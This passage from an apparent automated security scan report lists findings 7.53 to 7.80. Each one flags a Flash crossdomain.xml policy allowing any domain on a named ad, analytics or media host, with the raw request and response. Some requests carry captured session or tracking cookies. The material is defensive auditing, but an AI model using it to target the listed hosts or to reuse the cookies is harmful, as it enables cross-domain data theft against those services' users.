Host:   http://oas.guardian.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oas.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:59:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "7429f1-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.53. http://oasc12.247realmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc12.247realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oasc12.247realmedia.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:39:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "13624d-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.54. http://optout.collective-media.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: optout.collective-media.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 10:59:01 GMT
Content-Type: text/plain
Content-Length: 187
Last-Modified: Wed, 08 Sep 2010 17:14:24 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

7.55. http://optout.crwdcntrl.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: optout.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:01:43 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 09 Jun 2009 18:20:38 GMT
ETag: "aa06ef-a5-46bee6a616980"
Accept-Ranges: bytes
Content-Length: 165
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control    permitted-cross-domain-policies="master-only" />
   <allow-access-from    domain="*" />
</cross-domain-policy>

7.56. http://optout.invitemedia.com:9030/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.invitemedia.com:9030
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: optout.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 11:02:10 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

7.57. http://optout.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://optout.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: optout.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"288-1307635301000"
Last-Modified: Thu, 09 Jun 2011 16:01:41 GMT
Content-Type: application/xml
Content-Length: 288
Date: Sun, 04 Sep 2011 10:59:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.58. http://p.brilig.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.brilig.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:03:35 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 19 Jul 2011 01:32:40 GMT
ETag: "55fb1-ab-4a862176b1e00"
Accept-Ranges: bytes
Content-Length: 171
X-Brilig-D: D=76
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*"/>

</cross-domain-policy>


7.59. http://pbid.pro-market.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pbid.pro-market.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app1.ny
ETag: W/"207-1312809562000"
Last-Modified: Mon, 08 Aug 2011 13:19:22 GMT
Content-Type: application/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 10:59:02 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.60. http://pixel.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:24 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 23:52:41 GMT
Accept-Ranges: bytes
Content-Length: 211
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

7.61. http://pixel.adsafeprotected.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1313613444000"
Last-Modified: Wed, 17 Aug 2011 20:37:24 GMT
Content-Type: application/xml
Content-Length: 202
Date: Sun, 04 Sep 2011 02:39:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.62. http://pixel.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:23:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

7.63. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 02:38:59 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 02:38:59 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.64. http://plg3.yumenetworks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://plg3.yumenetworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: plg3.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ymbt=0rO0ABXcQAAAAAQAAAQQAAAU7AAAAAA**

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:18:50 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Last-Modified: Sun, 17 Aug 2008 20:37:49 GMT
ETag: "3208430-122-454add3f58140"
Accept-Ranges: bytes
Content-Length: 290
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allo
...[SNIP]...

7.65. http://premiumtv.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: premiumtv.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:22:19 GMT
Server: Omniture DC/2.0.0
xserver: www70
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

7.66. http://privacy.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://privacy.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: privacy.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 04 Sep 2011 10:59:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.67. http://r.casalemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:52 GMT
ETag: "1149011-e6-13ae3a00"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 02:40:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:40:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.68. http://r.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 02:41:29 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 02:41:28 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

7.69. http://r1-ads.ace.advertising.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r1-ads.ace.advertising.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 04 Sep 2011 03:03:34 GMT
Content-Type: text/xml
Content-Length: 81
Date: Sun, 04 Sep 2011 03:03:34 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.70. http://r1.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:06:34 GMT
ETag: "2438668-f7-44d91ae237a80"
Accept-Ranges: bytes
Content-Length: 247
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Date: Sun, 04 Sep 2011 02:42:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.71. http://recs.richrelevance.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: recs.richrelevance.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 06:04:52 GMT
Content-Type: text/plain
Content-Length: 108
Last-Modified: Mon, 08 Nov 2010 18:47:33 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.72. http://req.tidaltv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://req.tidaltv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: req.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 04 Sep 2011 03:19:16 GMT
ETag: "6b19a65f843cc1:138a"
Last-Modified: Fri, 15 Jul 2011 16:00:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 78
Connection: keep-alive

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.73. http://rp.gwallet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rp.gwallet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rp.gwallet.com

Response

HTTP/1.0 200 OK
Content-Length: 207
Server: radiumone/1.2
Content-type: text/xml; charset=UTF-8
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-
...[SNIP]...

7.74. http://rs.gwallet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.gwallet.com

Response

HTTP/1.0 200 OK
Content-Length: 207
Server: radiumone/1.2
Content-type: text/xml; charset=UTF-8
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-
...[SNIP]...

7.75. http://s.xp1.ru4.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 11:05:23 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:30 GMT
Content-length: 202
Etag: "ca-4ceae16e"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.76. http://s.ytimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.ytimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.ytimg.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT
Date: Thu, 01 Sep 2011 12:41:40 GMT
Expires: Thu, 08 Sep 2011 12:41:40 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 253585

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.77. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 03 Sep 2011 23:20:05 GMT
Expires: Fri, 02 Sep 2011 23:16:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 11624
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.78. http://search.spotxchange.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.spotxchange.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: search.spotxchange.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: history-0=eNrVUMtugzAQPKf%2F0srghIjcQjHEqGCVOGB8I4YIAwGkvoK%2Fvg6k7Q%2B0hx53Z2d2ZujWfzAMY7nYONbyfo9ivH3CHLmbjPaKdK%2BK1EgRGQBx9urcbN%2B4YYOSOS2ur1ho4S6u%2BIjXQvWX0O1lziJVpMmJ%2Bx7ge7zOqd4rBAgVMFR4RWBoRbSXxdl7KdKDJCayonqY%2BaqXWRqbnAVA67SitQf%2BOGkDIrEZuQLOf5GpPTUZiysGnfEI%2BcD9ZGRm28z41sLyx5PYBe8cBtUx%2BdYzNF8JX2eZ56seyNLilKfP2lNjhRRdInf6tfzCxDmpebqqy8Ruy50ziK653eKPKZf2X%2Fhex2Cirtm1rpq5QhJo2As6t736%2B7bdZozcA%2FhXbdPfbfvuEyw79EU%3D; user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTQ5NzczMjkK

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:19:21 GMT
Server: Apache
Last-Modified: Mon, 28 Feb 2011 23:42:39 GMT
ETag: "80647b-8b-4d6c32ef"
Accept-Ranges: bytes
Content-Length: 139
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.79. http://search.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:16 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 18:03:51 GMT
Accept-Ranges: bytes
Content-Length: 206
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 02:55:16 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.80. http://secure-uk.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-uk.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-uk.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 02:38:54 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Sun, 11 Sep 2011 02:38:54 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
